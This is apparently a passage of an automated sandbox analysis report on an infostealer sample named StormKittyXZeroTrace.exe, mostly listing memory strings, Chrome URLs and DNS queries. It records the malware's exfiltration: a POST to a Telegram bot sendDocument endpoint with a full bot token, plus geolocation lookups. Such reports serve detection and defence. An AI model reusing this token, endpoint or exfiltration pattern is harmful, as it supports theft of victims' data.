instance$3\|\|(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 0000000A.00000003.1031972512.000016F400328000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1026534072.000016F401534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3\|\|(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: e},"spellcheck":{"dictionaries":["en-US"],"dictionary":""},"supervised_user":{"metrics":{"day_id":154408}},"sync":{"autofill_wallet_import_enabled_migrated":true,"data_type_status_for_sync_to_signin":{"app_list":false,"app_settings":false,"apps":false,"arc_package":false,"autofill":false,"autofill_profiles":false,"autofill_wallet":false,"autofill_wallet_credential":false,"autofill_wallet_metadata":false,"autofill_wallet_offer":false,"autofill_wallet_usage":false,"bookmarks":false,"collaboration_group":false,"contact_info":false,"cookies":false,"device_info":false,"dictionary":false,"extension_settings":false,"extensions":false,"history":false,"history_delete_directives":false,"incoming_password_sharing_invitation":false,"managed_user_settings":false,"nigori":false,"os_preferences":false,"os_priority_preferences":false,"outgoing_password_sharing_invitation":false,"passwords":false,"plus_address":false,"plus_address_setting":false,"power_bookmark":false,"preferences":false,"printers":false,"printers_authorization_servers":false,"priority_preferences":false,"product_comparison":false,"reading_list":false,"saved_tab_group":false,"search_engines":false,"security_events":false,"send_tab_to_self":false,"sessions":false,"shared_tab_group_data":false,"sharing_message":false,"themes":false,"user_consent":false,"user_events":false,"web_apps":false,"webapks":false,"webauthn_credential":false,"wifi_configurations":false,"workspace_desk":false},"encryption_bootstrap_token_per_account_migration_done":true,"feature_status_for_sync_to_signin":5,"passwords_per_account_pref_migration_done":true,"requested":false},"tab_group_saves_ui_update_migrated":true,"toolbar":{"pinned_chrome_labs_migration_complete":true},"translate_site_blacklist":[],"translate_site_blocklist_with_time":{},"updateclientdata":{"apps":{"nmmhkkegccagdldgiimedpiccmgmieda":{"cohort":"1::","cohortname":"","dlrc":6640,"installdate":6640,"pf":"50b70b56-f9a8-488a-9bd0-bef34289ee8e"}}},"web_app":{"app_id":{"install_url":{"aghbiahbpaijignceidepookljebhfak":["https://drive.google.com/drive/installwebapp?usp=chrome_default"],"agimnkijcaahngcdmfeangaknmldooml":["https://www.youtube.com/s/notifications/manifest/cr_install.html"],"fhihpiojkbmbpdjeoajapmgkhlnakfjf":["https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default"],"fmgjjmmmlfnkbppncabfkddbjimcfncm":["https://mail.google.com/mail/installwebapp?usp=chrome_default"],"kefjledonklijopmnomlcbpllchaibag":["https://docs.google.com/presentation/installwebapp?usp=chrome_default"],"mpnpojknpmmopombnjdcgaaiekajbnjb":["https://docs.google.com/document/installwebapp?usp=chrome_default"]}}},"web_apps":{"did_migrate_default_chrome_apps":["MigrateDefaultChromeAppToWebAppsGSuite","MigrateDefaultChromeAppToWebAppsNonGSuite"],"last_preinstall_synchronize_version":"134","migrated_default_apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegncpnkpknbcohdij
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.1071850764.000016F40046C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: 41.140.13.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: get.geojs.io
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot8012951680:AAFEQmvyUuE56tBcSf7T4NBD4jzoxpVWuJs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="a986351d-dd72-4e48-a37c-7ed7456220e0"Host: api.telegram.orgContent-Length: 686842Expect: 100-continueConnection: Keep-Alive

Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009A8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009A8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 0000000A.00000002.1073248685.000016F40084C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: chrome.exe, 0000000A.00000002.1073633886.000016F400910000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1073589942.000016F4008F4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1070811065.000016F4000DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 0000000A.00000002.1075919363.000016F401078000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://get.geojs.io
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009E3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://get.geojs.iod
Source: chrome.exe, 0000000A.00000002.1070691311.000016F400086000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: chrome.exe, 0000000A.00000002.1075325745.000016F400E28000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1056508623.000001CF83ED7000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 0000000A.00000002.1075176475.000016F400DA4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E04000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 0000000A.00000002.1051881974.000001CF80010000.00000002.00000001.00040000.0000000E.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: tmp1B07.tmp.dat.0.dr	String found in binary or memory: https://ac.ecosia.org?q=
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1070630583.000016F40003C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1078129348.000016F4017A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1072948453.000016F400730000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1078129348.000016F4017A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AccountChooser
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000000A.00000002.1070735509.000016F4000B1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/samlredirect
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 0000000A.00000002.1072948453.000016F400730000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://adroll.com
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://adtrafficquality.google
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://apex-football.com
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009A8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: StormKittyXZeroTrace.exe.bin.exe	String found in binary or memory: https://api.telegram.org/bot
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8012951680:AAFEQmvyUuE56tBcSf7T4NBD4jzoxpVWuJs/sendDocumentT
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8012951680:AAFEQmvyUuE56tBcSf7T4NBD4jzoxpVWuJs/sendDocumentt
Source: chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://atomex.net
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://audienceproject.com
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beaconmax.com
Source: chrome.exe, 0000000A.00000002.1073720066.000016F400948000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
Source: chrome.exe, 0000000A.00000002.1072310952.000016F400590000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1077663173.000016F401524000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1077687307.000016F401534000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1032028147.000016F401554000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com
Source: chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074375347.000016F400B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076064219.000016F4010D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: tmp1B07.tmp.dat.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.0000000004499000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044BB000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075110765.000016F400D9F000.00000004.00001000.00020000.00000000.sdmp, tmp1B07.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.0000000004499000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044BB000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075110765.000016F400D9F000.00000004.00001000.00020000.00000000.sdmp, tmp1B07.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000000A.00000003.1032666164.000016F4013E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: chrome.exe, 0000000A.00000002.1058317906.000001CF861F7000.00000004.10000000.00040000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075278942.000016F400E04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1078188119.000016F4017D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075176475.000016F400DA4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enCtrl$1
Source: chrome.exe, 0000000A.00000003.1026330903.000016F40141C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1077202266.000016F40141C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076406692.000016F4011A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1032666164.000016F4013E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: chrome.exe, 0000000A.00000003.1012034167.000016F000504000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000000A.00000003.1012034167.000016F000504000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000000A.00000003.1011881993.000016F0004CC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1012011062.000016F0004E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011934759.000016F0004D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000000A.00000002.1073059935.000016F400790000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 0000000A.00000002.1073059935.000016F400790000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: chrome.exe, 0000000A.00000002.1071107853.000016F4001AC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000000A.00000002.1073791910.000016F400980000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/extensions
Source: chrome.exe, 0000000A.00000002.1073791910.000016F400980000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/themes
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.goog
Source: chrome.exe, 0000000A.00000003.1003165405.00001FD0000DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000000A.00000002.1073878093.000016F4009B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1073694476.000016F400938000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071107853.000016F4001AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076132213.000016F401118000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071028679.000016F400174000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074100077.000016F400A04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000000A.00000002.1073203488.000016F400804000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 0000000A.00000002.1073203488.000016F400804000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 0000000A.00000002.1073203488.000016F400804000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 0000000A.00000002.1071319449.000016F400238000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
